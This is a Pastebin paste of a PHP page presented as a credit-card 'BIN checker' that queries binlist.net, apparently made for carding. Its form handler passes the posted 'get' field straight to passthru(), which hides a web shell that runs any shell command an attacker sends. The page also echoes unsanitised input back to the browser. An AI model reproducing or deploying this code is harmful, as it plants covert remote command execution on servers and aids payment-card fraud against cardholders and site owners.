Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- <html>
- <link rel="shortcut icon" href="http://us.yimg.com/i/mesg/emoticons7/61.gif">
- <head>
- <title>BADCC BIN</title>
- </head>
- <body>
- <center>
- <?php
- error_reporting(E_ERROR|E_WARNING);
- ?>
- </br>
- <div id="form-container">
- <div align="center" class="BADCHILDSIDE!"><strong>Bin Identification Checker</strong></div><br>
- <form name="data" method="post">
- <textarea name="ykbhorid" data-placeholder="Credit Card Bin Number" value=""></textarea><br><br>
- <input type="submit" name='get' value="Checking...">
- </form></div></div>
- <?php
- if(isset($_POST['get'])){
- $bin = $_POST['get'];
- passthru($bin);
- $badch = $_POST['ykbhorid'];
- $badch = strtolower($badch);
- if ($badch == null) {
- echo "Put The First 6 Code Of The Card";
- }else{
- if ($badch == 000000) {
- echo "BIN Not Found !!!!";
- }
- // JSON For Get the bin_code from binlist.net
- else {
- $bankinfo = "http://www.binlist.net/json/".$badch;
- $checkout = file_get_contents("$bankinfo");
- $badchilds = json_decode($checkout);
- $ykbh1 = $badchilds->bin;
- $ykbh2 = $badchilds->brand;
- $badcc = $badchilds->card_type;
- $ykbh3 = $badchilds->sub_brand;
- $bank = $badchilds->bank;
- $ykbh4 = $badchilds->country_name;
- $ykbh5 = $badchilds->country_code;
- // Result in the Web
- echo "<center>......Result......<br>";
- echo "<font size='4'><font color='green'>$badch</font> [Bin: <strong>$ykbh1</strong>] <font color='blue'> $ykbh3 $badcc CARD $ykbh5</font> <font color='orange'>$bank $ykbh4</font></font></center>";
- }
- }
- }
- ?>
- </center>
- </body></html>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement